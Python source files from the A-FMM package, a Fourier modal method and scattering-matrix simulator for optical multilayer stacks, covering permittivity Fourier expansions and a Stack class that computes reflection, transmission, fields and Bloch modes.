return EPS | A-FMM | /a_fmm-0.1.0.tar.gz/a_fmm-0.1.0/A_FMM/creator.py | creator.py |
import numpy as np
from scipy import integrate
from scipy import linalg
import matplotlib.pyplot as plt
import numpy.linalg
import inspect
from matplotlib.backends.backend_pdf import PdfPages
def savefig(pdf, fig):
if isinstance(pdf, PdfPages):
pdf.savefig(fig)
elif isinstance(pdf, str):
with PdfPages(pdf) as a:
a.savefig(fig)
if pdf is not None:
plt.close()
def get_user_attributes(cls):
boring = dir(type("dummy", (object,), {}))
return [item for item in inspect.getmembers(cls) if item[0] not in boring]
def createG(Ng1, Ng2):
dic = {}
n = 0
for i in range(-Ng1, Ng1 + 1):
for j in range(-Ng2, Ng2 + 1):
# for j in range(-Ng2,Ng2+1):
# for i in range(-Ng1,Ng1+1):
dic[n] = (i, j)
n += 1
return dic
def inter_(n, x_list, eps_list):
if n == 0:
return eps_list[0] + sum(
[
-(eps_list[(j + 1) % len(eps_list)] - eps_list[j]) * x_list[j]
for j in range(len(x_list))
]
)
else:
return sum(
[
(eps_list[(j + 1) % len(eps_list)] - eps_list[j])
* np.exp(-(0 + 2j) * np.pi * n * x_list[j])
for j in range(len(x_list))
]
) / ((0 + 2j) * np.pi * n)
def inter_v(n, x_list, eps_list):
if n == 0:
return 1.0 / eps_list[0] + sum(
[
-(1.0 / eps_list[(j + 1) % len(eps_list)] - 1.0 / eps_list[j])
* x_list[j]
for j in range(len(x_list))
]
)
else:
return sum(
[
(1.0 / eps_list[(j + 1) % len(eps_list)] - 1.0 / eps_list[j])
* np.exp(-(0 + 2j) * np.pi * n * x_list[j])
for j in range(len(x_list))
]
) / ((0 + 2j) * np.pi * n)
def fou(nx, ny, x_list, y_list, eps_lists):
N = len(x_list)
f = []
for i in range(N):
f.append(inter_(ny, y_list, eps_lists[i]))
return (1 + 0j) * inter_(nx, x_list, f)
def create_epsilon(G, x_list, y_list, eps_lists):
D = len(G)
F = np.zeros((D, D), complex)
for i in range(D):
for j in range(D):
F[i, j] = fou(
G[i][0] - G[j][0], G[i][1] - G[j][1], x_list, y_list, eps_lists
)
return F
def fou_v(nx, ny, x_list, y_list, eps_lists):
N = len(x_list)
f = []
for i in range(N):
f.append(inter_v(ny, y_list, eps_lists[i]))
return (1 + 0j) * inter_(nx, x_list, f)
def fou_yx(Nx, Ny, G, x_list, y_list, eps_lists):
f = []
D = len(G)
nx = len(x_list)
for i in range(nx):
f.append(
linalg.inv(
linalg.toeplitz(
[inter_v(j + Ny, y_list, eps_lists[i]) for j in range(-Ny, Ny + 1)]
)
)
)
F = np.zeros((D, D), complex)
mx = 4 * Nx + 1
f = [inter_((i + 2 * Nx) % mx - 2 * Nx, x_list, f) for i in range(mx)]
for i in range(D):
for j in range(D):
F[i, j] = f[G[i][0] - G[j][0]][G[i][1] + Ny, G[j][1] + Ny]
return F
def fou_xy(Nx, Ny, G, x_list, y_list, eps_lists):
f = []
D = len(G)
nx = len(x_list)
ny = len(y_list)
for i in range(ny):
eps_t = [eps_lists[j][i] for j in range(nx)]
f.append(
linalg.inv(
linalg.toeplitz(
[inter_v(j + Nx, x_list, eps_t) for j in range(-Nx, Nx + 1)]
)
)
)
F = np.zeros((D, D), complex)
my = 4 * Ny + 1
f = [inter_((i + 2 * Ny) % my - 2 * Ny, y_list, f) for i in range(my)]
for i in range(D):
for j in range(D):
F[i, j] = f[G[i][1] - G[j][1]][G[i][0] + Nx, G[j][0] + Nx]
return F
def plot(n_max, x_list, eps_list, N=100):
x = np.linspace(-0.5, 0.5, N)
y = np.zeros(N, complex)
for n in range(-n_max, n_max + 1):
y += inter_(n, x_list, eps_list) * np.exp((0 + 2j) * np.pi * n * x)
# y+= slab_f(n,0.4)*np.exp((0+2j)*np.pi*n*x)
plt.plot(x, np.real(y))
plt.show()
def createK(dic, k0, kx=0.0, ky=0.0, Nyx=1.0):
D = len(dic)
K1 = np.zeros((D, D), dtype=complex)
K2 = np.zeros((D, D), dtype=complex)
for i in range(D):
# K1[i,i]=2.0*np.pi*dic[i][0]/k0*(1+0j)
# K2[i,i]=2.0*np.pi*dic[i][1]/k0*(1+0j)
K1[i, i] = (1 + 0j) * (dic[i][0] + kx) / k0
K2[i, i] = (1 + 0j) * (dic[i][1] + ky) / k0 / Nyx
return (K1, K2)
def create_2order(dic, K1, K2, INV, EPS1, EPS2):
D = len(dic)
ID = np.identity(D, dtype="complex")
I11 = -np.dot(K2, np.dot(INV, K1))
I12 = np.dot(K2, np.dot(INV, K2)) - ID
I21 = ID - np.dot(K1, np.dot(INV, K1))
I22 = np.dot(K1, np.dot(INV, K2))
B12 = np.vstack([np.hstack([I11, I12]), np.hstack([I21, I22])])
I11 = np.dot(K1, K2)
I22 = -np.dot(K1, K2)
I21 = np.dot(K1, K1) - EPS2
I12 = EPS1 - np.dot(K2, K2)
B21 = np.vstack([np.hstack([I11, I12]), np.hstack([I21, I22])])
# B=np.dot(B12,B21)
# print 3*'%15.8e' % (numpy.linalg.cond(B12),numpy.linalg.cond(B21),numpy.linalg.cond(B))
return np.dot(B12, B21)
# convention of Li article
def create_2order_new(D, Kx, Ky, INV, EPS1, EPS2):
ID = np.identity(D, dtype="complex")
F = np.vstack(
[
np.hstack([np.dot(np.dot(Kx, INV), Ky), ID - np.dot(np.dot(Kx, INV), Kx)]),
np.hstack([np.dot(np.dot(Ky, INV), Ky) - ID, -np.dot(np.dot(Ky, INV), Kx)]),
]
)
G = np.vstack(
[
np.hstack([-np.dot(Kx, Ky), np.dot(Kx, Kx) - EPS2]),
np.hstack([EPS1 - np.dot(Ky, Ky), np.dot(Kx, Ky)]),
]
)
# old version for control
# G=np.vstack([np.hstack([-np.dot(Kx,Ky),np.dot(Kx,Kx)-EPS2]),np.hstack([EPS1-np.dot(Ky,Ky),np.dot(Ky,Kx)])])
# F=np.vstack([np.hstack([np.dot(np.dot(Kx,INV),Ky),ID-np.dot(np.dot(Kx,INV),Kx)]),np.hstack([np.dot(np.dot(Ky,INV),Ky)-ID,-np.dot(np.dot(Ky,INV),Kx)])])
return G, np.dot(F, G)
# convention of Lalanne article
# def create_2order_new(D,Kx,Ky,INV,EPS1,EPS2):
# ID=np.identity(D,dtype='complex')
# F=np.vstack([np.hstack([np.dot(np.dot(Ky,INV),Kx),ID-np.dot(np.dot(Ky,INV),Ky)]),np.hstack([np.dot(np.dot(Kx,INV),Kx)-ID,-np.dot(np.dot(Kx,INV),Ky)])])
# G=np.vstack([np.hstack([np.dot(Kx,Ky),EPS1-np.dot(Ky,Ky)]),np.hstack([np.dot(Kx,Kx)-EPS2,-np.dot(Kx,Ky)])])
# return np.dot(F,G)
def fou_t(n, e):
q = 1.0 - e
return 1.0 * (n == 0) - 0.5 * q * (-1) ** n * (
np.sinc(n * q) + 0.5 * np.sinc(n * q - 1) + 0.5 * np.sinc(n * q + 1)
)
def t_inv(x, e):
q = 1.0 - e
e = 0.5 * e
xr = np.copy(x)
ind = np.abs(x) > e
xr[ind] = np.sign(x[ind]) * (
e + q / np.pi * np.arctan(np.pi / q * (np.abs(x[ind]) - e))
)
return xr
def t_dir(x, e):
q = 1.0 - e
e = 0.5 * e
xr = np.copy(x)
ind = np.abs(x) > e
xr[ind] = np.sign(x[ind]) * (
e + q / np.pi * np.tan(np.pi / q * (np.abs(x[ind]) - e))
)
return xr
def fou_complex_t(n, e):
g = 1.0 / (1 - 1j)
q = 1.0 - e
return 1.0 * (n == 0) - 0.5 * q * (-1) ** n * (
(1.0 + 0.25 * g) * np.sinc(n * q)
+ 0.5 * np.sinc(n * q - 1)
+ 0.5 * np.sinc(n * q + 1)
- g / 8.0 * (np.sinc(n * q - 2) + np.sinc(n * q + 2))
)
def num_fou(func, args, G, NX, NY, Nyx):
# [X,Y]=np.meshgrid(np.linspace(-0.5,0.5,NX),np.linspace(-0.5,0.5,NY))
[Y, X] = np.meshgrid(np.linspace(-0.5, 0.5, NY), np.linspace(-0.5, 0.5, NX))
F = func(X, Y / Nyx, *args)
F = np.fft.fftshift(F)
FOU = np.fft.fft2(F) / NX / NY
EPS = np.zeros((len(G), len(G)), dtype=complex)
for i in range(len(G)):
for j in range(len(G)):
EPS[i, j] = FOU[G[i][0] - G[j][0], G[i][1] - G[j][1]]
return EPS
def num_fou_xy(func, args, nx, ny, G, NX, NY, Nyx):
# [X,Y]=np.meshgrid(np.linspace(-0.5,0.5,NX),np.linspace(-0.5,0.5,NY))
[Y, X] = np.meshgrid(np.linspace(-0.5, 0.5, NY), np.linspace(-0.5, 0.5, NX))
F = 1.0 / func(X, Y / Nyx, *args)
F = np.fft.fftshift(F)
np.shape(F)
FOU = np.fft.fft(F, axis=0) / NX
# plt.figure()
# plt.imshow(np.abs(F),origin='lower')
# plt.colorbar()
# plt.savefig('F.png')
# plt.figure()
# plt.imshow(np.abs(FOU[:,:20]),aspect='auto',origin='lower')
# plt.colorbar()
# plt.savefig('FOU.png')
TEMP1 = np.zeros((NY, 2 * nx + 1, 2 * nx + 1), dtype=complex)
for i in range(-nx, nx + 1):
for j in range(-nx, nx + 1):
TEMP1[:, i, j] = FOU[i - j, :]
# print TEMP1[900,:,:]
TEMP2 = np.linalg.inv(TEMP1)
TEMP3 = np.fft.fft(TEMP2, axis=0) / NY
EPS = np.zeros((len(G), len(G)), dtype=complex)
for i in range(len(G)):
for j in range(len(G)):
EPS[i, j] = TEMP3[G[i][1] - G[j][1], G[i][0], G[j][0]]
return EPS
# return None
def num_fou_yx(func, args, nx, ny, G, NX, NY, Nyx):
# [X,Y]=np.meshgrid(np.linspace(-0.5,0.5,NX),np.linspace(-0.5,0.5,NY))
[Y, X] = np.meshgrid(np.linspace(-0.5, 0.5, NY), np.linspace(-0.5, 0.5, NX))
F = 1.0 / func(X, Y / Nyx, *args)
F = np.fft.fftshift(F)
FOU = np.fft.fft(F, axis=1) / NY
# plt.figure()
# plt.imshow(np.abs(F),origin='lower')
# plt.colorbar()
# plt.savefig('F.png')
# plt.figure()
# plt.imshow(np.abs(FOU[:,:20]),aspect='auto',origin='lower')
# plt.colorbar()
# plt.savefig('FOU.png')
TEMP1 = np.zeros((NX, 2 * ny + 1, 2 * ny + 1), dtype=complex)
for i in range(-ny, ny + 1):
for j in range(-ny, ny + 1):
TEMP1[:, i, j] = FOU[:, i - j]
# print TEMP1[900,:,:]
TEMP2 = np.linalg.inv(TEMP1)
TEMP3 = np.fft.fft(TEMP2, axis=0) / NX
EPS = np.zeros((len(G), len(G)), dtype=complex)
for i in range(len(G)):
for j in range(len(G)):
EPS[i, j] = TEMP3[G[i][0] - G[j][0], G[i][1], G[j][1]]
return EPS
# return None | A-FMM | /a_fmm-0.1.0.tar.gz/a_fmm-0.1.0/A_FMM/sub_sm.py | sub_sm.py |
from __future__ import annotations
import numpy as np
import A_FMM
import A_FMM.layer
import A_FMM.sub_sm as sub
from A_FMM.layer import Layer
from A_FMM.scattering import S_matrix
import matplotlib.pyplot as plt
import copy
from A_FMM.layer import Layer_empty_st
from matplotlib.backends.backend_pdf import PdfPages
# =============================================================================
# try:
# from multiprocessing import Pool
# except ModuleNotFoundError:
# print('WARNING: multiprocessing not available')
# =============================================================================
class Stack:
"""Class representing the multylayer object
This class is used for the definition of the multilayer object to be simulated using fourier expansion (x and y axis) and scattering matrix algorithm (z axis).
It is built from a list of layers and thicknesses. The value of the thickness of the first and last layer is irrelevant for the simulation, and it is used only to set the plotting window.
"""
def __init__(self, layers: list[Layer] = None, d: list[float] = None) -> None:
"""Creator
Args:
layers (list, optional): List of Layers: layers of the multylayer. Defaults to None (empty list).
d (list, optional): List of float: thicknesses of the multylayer. Defaults to None (empty list).
Raises:
ValueError: Raised if d and mat have different lengths
Returns:
None.
"""
layers = [] if layers is None else layers
d = [] if layers is None else d
if len(layers) != len(d):
raise ValueError("Different number of layers and thicknesses")
self.N = len(layers)
self.layers = layers
self.d = d
self.NPW = self.layers[0].D
self.G = self.layers[0].G
self.Nyx = self.layers[0].Nyx
self.count_interface()
@property
def total_length(self):
return sum(self.d)
def add_layer(self, lay: Layer, d: float) -> None:
"""Add a layer at the end of the multilayer
Args:
lay (Layer): Layer to be added.
d (float): thickness of the layer.
Returns:
None.
"""
self.layers.append(lay)
self.d.append(d)
self.N += 1
self.count_interface()
def transform(
self, ex: float = 0, ey: float = 0, complex_transform: bool = False
) -> tuple[np.ndarray]:
"""Function for adding the real coordinate transform to all layers of the stack
Note: for no mapping, set the width to 0
Args:
ex (float): relative width of the unmapped region in x direction. Default is 0 (no mapping)
ey (float): relative width of the unmapped region in y direction. Default is 0 (no mapping)
complex_transform (bool): False for real transform (default), True for complex one.
"""
Fx, Fy = self.layers[0].transform(
ex=ex, ey=ey, complex_transform=complex_transform
)
for layer in self.layers[1:]:
layer.add_transform_matrix(ex=ex, FX=Fx, ey=ey, FY=Fy)
return Fx, Fy
def count_interface(self) -> None:
"""Helper function to identify the different layers and the needed interfaces
Returns:
None.
"""
self.tot_thick = sum(self.d)
self.lay_list = []
for lay in self.layers:
if not lay in self.lay_list:
self.lay_list.append(lay)
self.int_list = []
self.interfaces = []
for i in range(self.N - 1):
T_inter = (self.layers[i], self.layers[i + 1])
if not T_inter in self.int_list:
self.int_list.append(T_inter)
self.interfaces.append(T_inter)
def solve(self, k0: float, kx: float = 0.0, ky: float = 0.0) -> None:
"""Calculates the scattering matrix of the multilayer (cpu friendly version)
This version of solve solve the system in the "smart" way, solving fisrt the eigenvalue problem in each unique layer and the interface matrices of all the interface involved. The computaitonal time scales with the number of different layers, not with the total one.
It prioritize minimize the calculation done while using more memory.
Args:
k0 (float): Vacuum wavevector for the simulation (freqency).
kx (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
ky (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
Returns:
None.
"""
for lay in self.lay_list:
lay.mode(k0, kx=kx, ky=ky)
# lay.get_P_norm()
self.layers[0].get_P_norm()
self.layers[-1].get_P_norm()
self.int_matrices = []
for i in self.int_list:
self.int_matrices.append(i[0].interface(i[1]))
self.S = copy.deepcopy(self.int_matrices[0])
for i in range(1, self.N - 1):
self.S.add_uniform(self.layers[i], self.d[i])
self.S.add(self.int_matrices[self.int_list.index(self.interfaces[i])])
def solve_serial(self, k0: float, kx: float = 0.0, ky: float = 0.0) -> None:
"""Calculates the scattering matrix of the multilayer (memory friendly version)
This version solves sequentially the layers and the interface as they are in the stack. It is more momery efficient since onlt the data of 2 layer are kept in memory at any given time. Computational time scales with the total number of layer, regardless if they are equal or not.
It prioritize memory efficiency while possibly requiring more calculations.
Args:
k0 (float): Vacuum wavevector for the simulation (freqency).
kx (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
ky (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
Returns:
None.
"""
lay1 = self.layers[0]
lay1.mode(k0, kx=kx, ky=ky)
lay1.get_P_norm()
self.S = S_matrix(2 * self.NPW)
for i in range(1, self.N):
lay2 = self.layers[i]
lay2.mode(k0, kx=kx, ky=ky)
self.S.add(lay1.interface(lay2))
self.S.add_uniform(lay2, self.d[i])
if lay1 is not lay2 and i != 1 and i != self.N:
lay1.clear()
lay1 = lay2
lay2.mode(k0, kx=kx, ky=ky)
lay2.get_P_norm()
def solve_lay(self, k0: float, kx: float = 0.0, ky: float = 0.0) -> None:
"""Solve the eigenvalue problem of all the layer in the stack
Args:
k0 (float): Vacuum wavevector for the simulation (freqency).
kx (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
ky (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
Returns:
None.
"""
for lay in self.lay_list:
lay.mode(k0, kx=kx, ky=ky)
# lay.get_P_norm()
self.layers[0].get_P_norm()
self.layers[-1].get_P_norm()
def solve_S(self) -> None:
"""Builds the scattering matrix of the stacks. It assumes that all the layers are alredy solved.
Returns:
None.
"""
self.int_matrices = []
for i in self.int_list:
self.int_matrices.append(i[0].interface(i[1]))
self.S = copy.deepcopy(self.int_matrices[0])
for i in range(1, self.N - 1):
self.S.add_uniform(self.layers[i], self.d[i])
self.S.add(self.int_matrices[self.int_list.index(self.interfaces[i])])
def get_prop(
self, u: np.ndarray, list_lay: list[int], d: np.ndarray = None
) -> dict[int, float]:
"""Calculates the total poyinting vector in the requiested layers
Args:
u (ndarray): array containing the modal coefficient incoming in the first layer.
list_lay (list of int): indexes of the layer of which to calculate the Poynting vector.
d (ndarray, optional): array containing the modal coefficient incoming in the last layer. Defaults to None.
Returns:
dic (dict): Dictionary of the Poyting vectors in the the layers {layer_index : Poyting vector}
"""
dic = {}
u1, d2 = np.zeros((2 * self.NPW), complex), np.zeros((2 * self.NPW), complex)
u1 = u
if d != None:
d2 = d
(u2, d1) = self.S.output(u1, d2)
lay = self.layers[0]
d = self.d[0]
if 0 in list_lay:
P = lay.get_Poynting(u1, d1)
dic[0] = P
# intermediate layers
S1 = copy.deepcopy(self.int_matrices[self.int_list.index(self.interfaces[0])])
for i in range(1, self.N - 1):
S2 = S_matrix(S1.N)
for l in range(i, self.N - 1):
S2.add_uniform(self.layers[l], self.d[l])
S2.add(self.int_matrices[self.int_list.index(self.interfaces[l])])
if i in list_lay:
(ul, dl) = S1.int_f_tot(S2, u1, d2)
P = self.layers[i].get_Poynting(ul, dl)
dic[i] = P
S1.add_uniform(self.layers[i], self.d[i])
S1.add(self.int_matrices[self.int_list.index(self.interfaces[i])])
lay = self.layers[-1]
d = self.d[-1]
if self.N - 1 in list_lay:
P = lay.get_Poynting(u2, d2)
dic[self.N - 1] = P
return dic
def get_energybalance(self, u: np.ndarray, d: np.ndarray = None) -> tuple[float]:
"""Get total energy balance of the stack given the inputs
Return total power reflected, transmitted and absorbed, normalized to the incidenc power.
Args:
u (1darray): Modal coefficient of the left input.
d (1darray, optional): Modal coefficent of the right input. Defaults to None.
Returns:
tuple: tuple contining tree floats with meaning:
- Total power out from left side (reflection if only u).
- Total power out from right side (transmission if only u).
- Total power absorbed in the stack.
"""
u1, d2, e = (
np.zeros((2 * self.NPW), complex),
np.zeros((2 * self.NPW), complex),
np.zeros((2 * self.NPW), complex),
)
u1 = u
PN = self.layers[0].get_Poynting(u1, e)
if d is not None:
d2 = d
PN -= self.layers[-1].get_Poynting(e, d2)
(u2, d1) = self.S.output(u1, d2)
P1 = self.layers[0].get_Poynting(u1, d1)
P2 = self.layers[-1].get_Poynting(u2, d2)
return P1 / PN, P2 / PN, (P1 - P2) / PN
def get_inout(
self, u: np.ndarray, d: np.ndarray = None
) -> dict[str, tuple[np.ndarray, np.ndarray, float]]:
"""Return data about the output of the structure given the input
Args:
u (1darray): Vector of the modal coefficents of the right inputs.
d (1darray, optional): Vector of the modal coefficents of the right inputs. Defaults to None.
Returns:
dict: Dictionary containing data of the output:
- 'left' : (u,d,P): forward modal coefficient, backward modal coefficient and Poyinting vector at the left side.
- 'right' : (u,d,P): forward modal coefficient, backward modal coefficient and Poyinting vector at the right side.
"""
u1, d2 = np.zeros((2 * self.NPW), complex), np.zeros((2 * self.NPW), complex)
u1 = u
if d != None:
d2 = d
(u2, d1) = self.S.output(u1, d2)
dic = {}
P = self.layers[0].get_Poynting(u1, d1)
dic["left"] = (u1, d1, P)
P = self.layers[-1].get_Poynting(u2, d2)
dic["right"] = (u2, d2, P)
return dic
def get_R(self, i: int, j: int, ordered: bool = True) -> float:
"""Get relfection coefficient between modes
Args:
i (int): Index of the source mode.
j (int): Index of the target mode.
ordered (bool, optional): If True, modes are ordered for decrasing effective index, otherwise the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
float: Reflection between the modes
"""
if ordered:
j1 = np.argsort(self.layers[0].W)[-i - 1]
j2 = np.argsort(self.layers[0].W)[-j - 1]
else:
j1 = i
j2 = j
return (
np.abs(self.S.S21[j1, j2]) ** 2
* self.layers[0].P_norm[j2]
/ self.layers[0].P_norm[j1]
)
def get_T(self, i: int, j: int, ordered: bool = True) -> float:
"""Get transmission coefficient between modes.
Args:
i (int): Index of the source mode.
j (int): Index of the target mode.
ordered (bool, optional): If True, modes are ordered for decrasing effective index, otherwise the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
float: Transmission between the modes.
"""
if ordered:
j1 = np.argsort(self.layers[0].W)[-i - 1]
j2 = np.argsort(self.layers[-1].W)[-j - 1]
else:
j1 = i
j2 = j
return (
np.abs(self.S.S11[j2, j1]) ** 2
* self.layers[-1].P_norm[j2]
/ self.layers[0].P_norm[j1]
)
def get_PR(self, i: int, j: int, ordered: bool = True) -> float:
"""Get phase of the relfection coefficient between modes
Args:
i (int): Index of the source mode.
j (int): Index of the target mode.
ordered (bool, optional): If True, modes are ordered for decrasing effective index, otherwise the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
float: Phase of reflection between the modes
"""
if ordered:
j1 = np.argsort(self.layers[0].W)[-i - 1]
j2 = np.argsort(self.layers[0].W)[-j - 1]
else:
j1 = i
j2 = j
return np.angle(self.S.S21[j2, j1])
def get_PT(self, i: int, j: int, ordered: bool = True) -> float:
"""Get phase of the transmission coefficient between modes
Args:
i (int): Index of the source mode.
j (int): Index of the target mode.
ordered (bool, optional): If True, modes are ordered for decrasing effective index, otherwise the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
float: Phase of transmission between the modes
"""
if ordered:
j1 = np.argsort(self.layers[0].W)[-i - 1]
j2 = np.argsort(self.layers[-1].W)[-j - 1]
else:
j1 = i
j2 = j
return np.angle(self.S.S11[j2, j1])
def get_el(self, sel: str, i: int, j: int) -> complex:
"""Returns element of the scattering matrix
Note: Modes are ordered for decrasing effective index
Args:
sel (str): First index of the matrix.
i (int): Second index of the matrix.
j (int): Select the relevand submatrix. Choises are '11', '12', '21', '22'.
Raises:
ValueError: If sel in not in the allowed.
Returns:
complex: Element of the scattering matrix.
"""
io = np.argsort(self.layers[0].W)[-i]
jo = np.argsort(self.layers[-1].W)[-j]
if sel == "11":
return self.S.S11[io, jo]
elif sel == "12":
return self.S.S12[io, jo]
elif sel == "21":
return self.S.S21[io, jo]
elif sel == "22":
return self.S.S22[io, jo]
else:
raise ValueError(f"Sel {sel} not allowed. Only '11', '12', '21', '22'")
def double(self) -> None:
"""Compose the scattering matrix of the stack with itself, doubling the structure
When doing this, the lenght of the first al last layer are ignored (set to 0).
To function properly hoever they need to be equal (but do not need to have physical meaning)
Raises:
RuntimeError: Raised if the stack is not solved yet.
Returns:
None.
"""
try:
self.S.add(self.S)
except AttributeError:
raise RuntimeError("structure not solved yet")
def join(self, st2: Stack) -> None:
"""Join the scattering matrix of the structure with the one of a second structure
When doing this, the lenght of the first al last layeror each stack are ignored (set to 0).
To function last layer of self and first of st2 need to be equal (but do not need to have physical meaning).
The condiction used to previoselt solve the stack needs to be the same. This is not checked by the code, so be careful.
Args:
st2 (Stack): Stack to which to join self.
Raises:
RuntimeError: Raised is one the structure is not solved yet.
Returns:
None.
"""
try:
self.S
except AttributeError:
raise RuntimeError("structure 1 not solved yet")
try:
st2.S
except AttributeError:
raise RuntimeError("structure 2 not solved yet")
self.S.add(st2.S)
l1 = self.layers[:-1]
l2 = st2.layers[1:]
self.layers = l1 + l2
def flip(self) -> None:
"""Flip a solved stack
Flip the stack, swapping the left and right side
Raises:
RuntimeError: Raised if the structure is not solved yet.
Returns:
None.
"""
try:
S = copy.deepcopy(self.S)
self.S.S11 = S.S22
self.S.S22 = S.S11
self.S.S12 = S.S21
self.S.S21 = S.S12
except AttributeError:
raise RuntimeError("structure not solved yet")
self.layers = self.layers[::-1]
self.d = self.d[::-1]
def bloch_modes(self) -> np.ndarray:
"""Calculates Bloch modes of the stack.
This function assumens the stack to represent the unit cell of a periodic structure, and calculates the corresponding Bloch modes.
The thickness of the first and last layer are ignored (assumed 0). To work correctly first and last layer needs to be the same.
Returns:
TYPE: DESCRIPTION.
"""
[self.BW, self.BV] = self.S.S_modes()
self.Bk = -(0.0 + 1j) * np.log(self.BW) / (2.0 * np.pi * self.tot_thick)
# reorder modes
ind = np.argsort((0.0 + 1.0j) * self.Bk)
self.BW = self.BW[ind]
self.Bk = self.Bk[ind]
self.BV[:, :] = self.BV[:, ind]
return self.Bk
def loop_intermediate(self, u1: np.ndarray, d2: np.ndarray) -> tuple:
"""Generator for the intermedia modal coefficients.
Progressively yields the forward and backward modal coefficient given the external excitation.
Args:
u1 (np.ndarray): forward modal coefficient of the first layer (near the interface)
d2 ((np.ndarray): backward modal coefficient of the last layer (near the interface)
Yields:
np.ndarray: forward modal amplitudes of layer
np.ndarray: backward modal amplitudes for layer
Layer: layer object
float: thickness of the layer
"""
u2, d1 = self.S.output(u1, d2)
lay = self.layers[0]
d = self.d[0]
yield u1 * np.exp(-(0 + 2j) * np.pi * lay.k0 * lay.gamma * d), d1 * np.exp(
(0 + 2j) * np.pi * lay.k0 * lay.gamma * d
), self.layers[0], self.d[0]
# yield u1 , d1 , self.layers[0], self.d[0]
S1 = copy.deepcopy(self.int_matrices[self.int_list.index(self.interfaces[0])])
for i in range(1, self.N - 1):
S2 = S_matrix(S1.N)
for l in range(i, self.N - 1):
S2.add_uniform(self.layers[l], self.d[l])
S2.add(self.int_matrices[self.int_list.index(self.interfaces[l])])
ul, dl = S1.int_f(S2, u1)
yield ul, dl, self.layers[i], self.d[i]
S1.add_uniform(self.layers[i], self.d[i])
S1.add(self.int_matrices[self.int_list.index(self.interfaces[i])])
yield u2, d2, self.layers[self.N - 1], self.d[self.N - 1] + 1e-6
def calculate_epsilon(
self,
x: np.ndarray = 0.0,
y: np.ndarray = 0.0,
z: np.ndarray = 0.0,
) -> dict[str, np.ndarray]:
"""Returns epsilon in the stack
Epsilon is calculated on a meshgrdi of x,y,z
Args:
x (np.ndarray): x coordinate (1D array)
y (np.ndarray): y coordinate (1D array)
z (np.ndarray): z coordinate (1D array)
Returs:
dict: Dictionary containing the coordinates and the epsilon
"""
x, y, z = np.asarray(x), np.asarray(y), np.asarray(z)
eps = {key: [] for key in ["x", "y", "z", "eps"]}
cumulative_t = 0
for lay, t in zip(self.layers + [self.layers[-1]], self.d + [np.inf]):
ind = np.logical_and(cumulative_t <= z, z < cumulative_t + t)
if ind.size == 0:
continue
zp = z[ind] - cumulative_t
out = lay.calculate_epsilon(x, y, zp)
out["z"] = out["z"] + cumulative_t
for key in eps:
eps[key].append(out[key])
cumulative_t += t
for key in eps:
eps[key] = np.concatenate(eps[key], axis=-1)
return eps
def calculate_fields(
self,
u1: np.ndarray,
d2: np.ndarray = None,
x: np.ndarray = 0,
y: np.ndarray = 0,
z: np.ndarray = 0,
components: list[str] = None,
) -> dict[str, np.ndarray]:
"""Returns fields in the stack
The fields are calculated on a meshgrdi of x,y,z
Args:
u1 (np.ndarray): forward modal coefficient in the first layer
d2 (np.ndarray): backward modal coefficient in the last layer
x (np.ndarray): x coordinate (1D array)
y (np.ndarray): y coordinate (1D array)
z (np.ndarray): z coordinate (1D array)
components (list): List of modal componets to be calculated. Possible are ['Ex', 'Ey', 'Hx', 'Hz'].
Default to None (all of them).
Returs:
dict: Dictionary containing the coordinates and the field components
"""
d2 = np.zeros(2 * self.NPW, dtype=complex)
x, y, z = np.asarray(x), np.asarray(y), np.asarray(z)
components = Layer._filter_componets(components)
shape = Layer._check_array_shapes(u1, d2)
keys = ["x", "y", "z"] + components
field = {key: [] for key in keys}
cumulative_t = 0
for u, d, lay, t in self.loop_intermediate(u1, d2):
# print(u, d)
ind = np.logical_and(cumulative_t <= z, z < cumulative_t + t)
if ind.size == 0:
continue
zp = z[ind] - cumulative_t
out = lay.calculate_field(u, d, x, y, zp, components=components)
out["z"] = out["z"] + cumulative_t
for key in keys:
field[key].append(out[key])
# plt.plot(np.abs(out['Ex']))
# plt.show()
# plt.plot(np.abs(field['Ex']))
cumulative_t += t
for key in keys:
field[key] = np.concatenate(field[key], axis=-1)
return field
def inspect(self, st: str = "", details: str = "no") -> None:
"""Print some info about the Stack"""
att = sub.get_user_attributes(self)
print(st)
print(22 * "_")
print("| INT argument")
for i in att:
if type(i[1]) is int:
print("|%10s%10s" % (i[0], str(i[1])))
print("| Float argument")
for i in att:
if type(i[1]) is float:
print("|%10s%10s" % (i[0], str(i[1])))
for i in att:
if type(i[1]) is np.float64:
print("|%10s%10s" % (i[0], str(i[1])))
print("| BOOL argument")
for i in att:
if type(i[1]) is bool:
print("|%10s%10s" % (i[0], str(i[1])))
print("| Array argument")
for i in att:
if type(i[1]) is np.ndarray:
print("|%10s%10s" % (i[0], str(np.shape(i[1]))))
print("| List argument")
for i in att:
if type(i[1]) is list:
print("|%12s%8s" % (i[0], str(len(i[1]))))
print("")
try:
print("lay list:")
for s in self.lay_list:
print(s)
print("layers:")
for s in self.layers:
print(s)
print("int_list:")
for s in self.int_list:
print(s)
print("interfaces:")
for s in self.interfaces:
print(s)
except AttributeError:
print("No list yet, call conut_interface before inspect")
if __name__ == "__main__":
from monitor import Timer
import pickle
timer = Timer()
N = 50
cr = A_FMM.Creator()
cr.slab(12.0, 2.0, 2.0, 0.3)
lay1 = A_FMM.layer.Layer(N, 0, creator=cr)
cr.slab(12.0, 2.0, 2.0, 0.1)
lay2 = A_FMM.layer.Layer(N, 0, creator=cr)
stack = Stack(
10 * [lay1, lay2] + [lay1],
[0.0] + 10 * [0.5, 0.5],
)
x, y, z = np.linspace(-0.5, 0.5, 101), 0.0, np.linspace(0.0, 10.0, 1000)
eps = stack.calculate_epsilon(x, y, z)
print(eps.keys())
plt.contourf(
np.squeeze(eps["z"]), np.squeeze(eps["x"]), np.squeeze(eps["eps"]), levels=41
)
plt.show()
# lay1 = A_FMM.layer.Layer_uniform(0,0,2.0)
# lay2 = A_FMM.layer.Layer_uniform(0,0,12.0)
# stack = Stack(
